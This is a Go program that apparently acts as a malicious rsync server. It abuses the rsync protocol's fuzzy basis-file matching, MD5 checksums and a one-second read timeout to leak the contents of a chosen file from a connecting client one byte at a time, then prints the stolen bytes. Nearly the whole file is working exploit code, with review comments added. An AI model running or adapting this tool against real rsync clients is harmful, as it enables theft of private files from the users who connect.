package main

import (
	"crypto/md5"
	"encoding/binary"
	"fmt"
	"net"
	"os"
	"strconv"
	"time"

	"flag"
)

// Multiplexing: every payload written to the peer is wrapped in a 4-byte
// header whose top byte is the message tag plus mPlexBase (see getMsg).
const (
	mPlexBase  = 7
	msgDataTag = 0
)

// Flag bit written at the start of each file-list entry (see sendEntry).
const xmitLongName = 1 << 6

// Item-flag bits written ahead of a transfer (see sendFileEntry).
const (
	itemBasisTypeFollows = 1 << 11
	itemXNameFollows     = 1 << 12
	itemTransfer         = 1 << 15
)

// Octal mode values.
// NOTE(review): 040000 is the POSIX S_IFDIR bit pattern and 0100000 is
// S_IFREG, so these names look swapped relative to their values — confirm
// before relying on the names.
const (
	fileMode = 040000
	dirMode  = 0100000
)

// Basis-type byte written as the "compare type" in sendFileEntry.
const fNameCmpFuzzy = 0x83

// Index value writeNdx encodes as a single zero byte.
const ndxDone = -1

const (
	// Length in bytes of the checksum produced by getCsum (MD5).
	cSumLength = 16
	// Size of the scratch/read buffer used per connection.
	bigBufferSize = 4096 + 1024
)

// Command-line options.
var (
	port       = flag.Int("port", 8080, "Port to listen on")
	targetFile = flag.String("target", "", "File path to leak")
	leakSize   = flag.Int("size", 0, "Size to leak from file")
)

// getMsg frames the first length bytes of data as one multiplexed message:
// a 4-byte little-endian header holding ((tag+mPlexBase)<<24)+length,
// followed by the payload bytes. It panics if length is negative or exceeds
// cap(data).
func getMsg(tag int, data []byte, length int) []byte {
	header := uint32(((tag + mPlexBase) << 24) + length)

	frame := make([]byte, 4, 4+length)
	binary.LittleEndian.PutUint32(frame, header)

	return append(frame, data[:length]...)
}

// getVarInt encodes num in a variable-length form. It trims the high zero
// bytes from num's little-endian bytes and prefixes a lead byte that marks
// how many bytes follow. Presumably this mirrors rsync's write_varint.
// NOTE(review): confirm against the reference implementation. In the branch
// that grows the output by one byte, the lead byte is computed as
// `^bit - 1`, which is not the same value as `^(bit - 1)`.
func getVarInt(num uint32) []byte {
	// b[0] is reserved for the lead byte; b[1:5] holds num little-endian.
	b := make([]byte, 1)
	b = binary.LittleEndian.AppendUint32(b, num)
	count := byte(4)

	// Find the highest non-zero byte of num (index 1..4), keeping at least one.
	for count = 4; count > 1 && b[count] == 0; count-- {
	}
	// Exclusive upper bound on a top byte that can share the lead byte
	// with the length marker.
	bit := byte(1 << (7 - count + 1))

	if b[count] >= bit {
		// Top byte does not fit in the lead byte: emit it in full after the lead.
		count++
		b[0] = (^bit - 1)
	} else if count > 1 {
		// Fold the top byte into the lead byte together with the length marker.
		b[0] = b[count] | ^(bit*2 - 1)
	} else {
		// A single small byte is its own encoding.
		b[0] = b[1]
	}

	return b[:count]
}

// ndxCtx holds the previous index values that index encoding deltas against.
// Positive and negative indexes are tracked separately for each direction.
// writeNdx reads and updates the Outbound fields. The Inbound fields are not
// referenced elsewhere in this file.
type ndxCtx struct {
	prevPositiveOutbound, prevNegativeOutbound int
	prevPositiveInbound, prevNegativeInbound   int
}

// writeNdx writes the index ndx to conn as one framed data message. It
// delta-encodes ndx against the previous index of the same sign stored in
// ctx. Presumably this mirrors rsync's write_ndx wire format — TODO confirm.
//
// Encoding produced below:
//   - ndx == ndxDone: a single 0x00 byte; ctx is left unchanged.
//   - negative ndx: a 0xFF prefix, then -ndx encoded as below against the
//     previous negative value.
//   - 0 < diff < 0xFE: one byte holding diff.
//   - diff < 0 or diff > 0x7FFF: 0xFE, then the absolute index as its top
//     byte (high bit set) followed by its low three bytes little-endian.
//   - otherwise (including diff == 0): 0xFE, then diff as two big-endian
//     bytes.
//
// The Outbound fields of ctx are updated as a side effect. Write errors are
// ignored.
func writeNdx(conn net.Conn, ndx int, ctx *ndxCtx) {
	// state of the current reduction
	diff := 0
	cnt := 0
	// Largest output: a 0xFF prefix plus the five bytes of the long form.
	b := make([]byte, 6)

	if ndx >= 0 {
		diff = ndx - ctx.prevPositiveOutbound
		ctx.prevPositiveOutbound = ndx
	} else if ndx == ndxDone {
		// The done marker is a single zero byte and does not touch ctx.
		conn.Write(getMsg(msgDataTag, make([]byte, 1), 1))
		return
	} else {
		// Negative index: 0xFF prefix, then encode the magnitude against the
		// previous negative index.
		b[cnt] = 0xff
		cnt++
		ndx = -ndx
		diff = ndx - ctx.prevNegativeOutbound
		ctx.prevNegativeOutbound = ndx
	}

	if diff < 0xFE && diff > 0 {
		// Short form: the delta fits in one byte.
		b[cnt] = byte(diff)
		cnt++
	} else if diff < 0 || diff > 0x7FFF {
		// Long form: absolute index, top byte first with its high bit set,
		// then the low three bytes in little-endian order.
		b[cnt] = byte(0xFE)
		cnt++
		b[cnt] = byte(ndx>>24) | 0x80
		cnt++
		b[cnt] = byte(ndx)
		cnt++
		b[cnt] = byte(ndx >> 8)
		cnt++
		b[cnt] = byte(ndx >> 16)
		cnt++
	} else {
		// Medium form: the delta as two big-endian bytes.
		b[cnt] = 0xFE
		cnt++
		b[cnt] = byte(diff >> 8)
		cnt++
		b[cnt] = byte(diff)
		cnt++
	}

	data := b[:cnt]
	conn.Write(getMsg(msgDataTag, data, len(data)))
	return
}

// sendEntry writes one file-list entry for fileName with mode entryMode to
// conn. Each part is sent as a separately framed data message, in order:
//   - the flags byte (xmitLongName);
//   - the name length as a varint (getVarInt);
//   - the name bytes;
//   - three zero bytes in the file-length position;
//   - four zero bytes for the modification time;
//   - entryMode as a 4-byte little-endian value.
//
// Write errors are ignored.
func sendEntry(conn net.Conn, fileName string, entryMode uint32) {
	// Scratch buffer; only its leading bytes are ever sent.
	data := make([]byte, 4096)
	// flist flags
	data[0] = xmitLongName
	conn.Write(getMsg(msgDataTag, data, 1))

	// Filename
	name := []byte(fileName)
	fileNameLength := getVarInt(uint32(len(name)))
	conn.Write(getMsg(msgDataTag, fileNameLength, len(fileNameLength)))
	conn.Write(getMsg(msgDataTag, name, len(name)))

	// Right now we just do 0 since we don't have varlong30 implemented
	// File Length
	data[0] = 0
	data[1] = 0
	data[2] = 0
	data[3] = 0
	conn.Write(getMsg(msgDataTag, data, 3))

	// modtime (four zero bytes from the cleared buffer)
	conn.Write(getMsg(msgDataTag, data, 4))

	// Mode
	mode := make([]byte, 0)
	mode = binary.LittleEndian.AppendUint32(mode, entryMode)
	conn.Write(getMsg(msgDataTag, mode, 4))
}

// sendFileEntry writes the per-file transfer data that follows an index. Each
// part is sent as a separately framed data message, in order:
//   - item flags (itemTransfer|itemBasisTypeFollows|itemXNameFollows) as a
//     2-byte little-endian value;
//   - the basis type byte fNameCmpFuzzy;
//   - the basis name, taken from *targetFile, preceded by a one-byte length;
//   - four 32-bit little-endian header fields: 0, blen, blen, 0;
//   - a 0xFFFFFFFF token, then a zero token;
//   - the cSumLength bytes of csum.
//
// NOTE(review): the fileName and fileMode parameters are not used by the
// body (fileMode also shadows the package-level constant of the same name).
// Because the basis-name length is written as a single byte, a *targetFile
// longer than 255 bytes would have its length truncated. Write errors are
// ignored.
func sendFileEntry(conn net.Conn, fileName string, fileMode uint32, blen uint32, csum [cSumLength]byte) {
	// iflags
	iflags := make([]byte, 0)
	iflags = binary.LittleEndian.AppendUint16(iflags, itemTransfer|itemBasisTypeFollows|itemXNameFollows)
	conn.Write(getMsg(msgDataTag, iflags, len(iflags)))

	// compare type
	cmp := make([]byte, 1)
	cmp[0] = fNameCmpFuzzy
	conn.Write(getMsg(msgDataTag, cmp, 1))

	// Target file (length is sent as one byte)
	target := []byte(*targetFile)
	tlen := make([]byte, 1)
	tlen[0] = byte(len(target))
	conn.Write(getMsg(msgDataTag, tlen, 1))
	conn.Write(getMsg(msgDataTag, target, len(target)))

	// in receive_data
	// send head
	// count
	conn.Write(getMsg(msgDataTag, make([]byte, 4), 4))
	// blength (written twice, then a zero field)
	blength := make([]byte, 0)
	blength = binary.LittleEndian.AppendUint32(blength, blen)
	conn.Write(getMsg(msgDataTag, blength, 4))
	conn.Write(getMsg(msgDataTag, blength, 4))
	conn.Write(getMsg(msgDataTag, make([]byte, 4), 4))

	// Send token -1 to copy from target
	token := make([]byte, 0)
	token = binary.LittleEndian.AppendUint32(token, 0xffffffff)
	conn.Write(getMsg(msgDataTag, token, 4))

	// 0 to finish
	conn.Write(getMsg(msgDataTag, make([]byte, 4), 4))

	// Send checksum
	conn.Write(getMsg(msgDataTag, csum[:], cSumLength))
	return
}

// getCsum returns the checksum of data. MD5 is the only algorithm supported,
// so the result is always the 16-byte MD5 digest.
func getCsum(data []byte) [cSumLength]byte {
	return md5.Sum(data)
}

// handleConnection drives one client connection through these steps:
//  1. Write the greeting lines and a compat-flags byte.
//  2. Write a file list of 256 * *leakSize entries named "000/", "001/", …,
//     each sent with dirMode.
//  3. For each of *leakSize byte positions, try candidate values 0..255.
//     Each attempt sends the next index plus a transfer whose checksum is
//     the MD5 of the bytes recovered so far followed by the candidate.
//     A read that times out after one second is taken as confirming the
//     candidate.
//
// The recovered bytes are printed. Write errors are ignored. Any read error
// other than a timeout ends the handler.
//
// NOTE(review): conn is never closed on any return path.
func handleConnection(conn net.Conn) {
	fmt.Println("Connection from:", conn.RemoteAddr())

	data := make([]byte, bigBufferSize)

	// Prologue
	conn.Write([]byte("@RSYNCD: 30.0 sha1\n"))
	conn.Write([]byte("files\n"))
	conn.Write([]byte("@RSYNCD: OK\n"))

	// compat flags (a single zero byte from the fresh buffer)
	msg := getMsg(msgDataTag, data, 1)
	conn.Write(msg)

	fmt.Printf("[+] Sending file entry: %d files\n", *leakSize*256)

	for i := 0; i < 256**leakSize; i++ {
		fname := fmt.Sprintf("%03d/", i)
		sendEntry(conn, fname, dirMode)
	}

	// err?
	data[0] = 0
	conn.Write(getMsg(msgDataTag, data, 1))

	// Drain input (a single Read; it may not consume everything the peer sent)
	conn.Read(data)

	ctx := ndxCtx{}
	leaked := make([]byte, *leakSize)
	// Index sent with the first attempt; incremented once per attempt.
	ndx := 2

	fmt.Printf("[+] Starting to leak %s\n", *targetFile)
	for i := 0; i < *leakSize; i++ {
		found := false
		for j := 0; j < 256; j++ {
			writeNdx(conn, ndx, &ctx)
			ndx++
			// Candidate byte j for position i; checksum covers leaked[:i+1].
			leaked[i] = byte(j)
			csum := getCsum(leaked[:i+1])
			sendFileEntry(conn, "leak", fileMode, uint32(i+1), csum)

			// We determine if the server sent data or not with a timeout.
			conn.SetReadDeadline(time.Now().Add(1 * time.Second))
			_, err := conn.Read(data)

			if err != nil {
				if netErr, ok := err.(net.Error); ok && netErr.Timeout() {
					fmt.Printf("[+] Leaked: %02x\n", j)
					found = true
					break
				} else {
					fmt.Println(err)
					return
				}
			}
		}

		if !found {
			fmt.Printf("[-] Failed to leak byte. Total bytes leaked %d\n\n", i)

			// Print any data we already leaked.
			if i > 0 {
				fmt.Printf("%s\n", string(leaked))
			}
			return
		}
	}

	fmt.Printf("[+] Leaked %d bytes from %s\n\n", *leakSize, *targetFile)
	fmt.Println("---")
	fmt.Printf("%s\n", string(leaked))

	return
}

// main parses the command-line flags and requires --target and --size. It
// then listens on TCP --port and handles each accepted connection in its own
// goroutine. It exits with status -1 when a required flag is missing and
// returns early if the listener cannot be created.
func main() {
	flag.Parse()

	missingTarget := *targetFile == ""
	missingSize := *leakSize == 0
	if missingTarget || missingSize {
		fmt.Println("--target and --size are required")
		os.Exit(-1)
	}

	portStr := strconv.Itoa(*port)

	ln, err := net.Listen("tcp", ":"+portStr)
	if err != nil {
		fmt.Println("Error listening:", err)
		return
	}
	defer ln.Close()

	fmt.Println("Listening on port " + portStr)

	for {
		conn, acceptErr := ln.Accept()
		if acceptErr != nil {
			fmt.Println("Error accepting connection:", acceptErr)
			continue
		}
		go handleConnection(conn)
	}
}
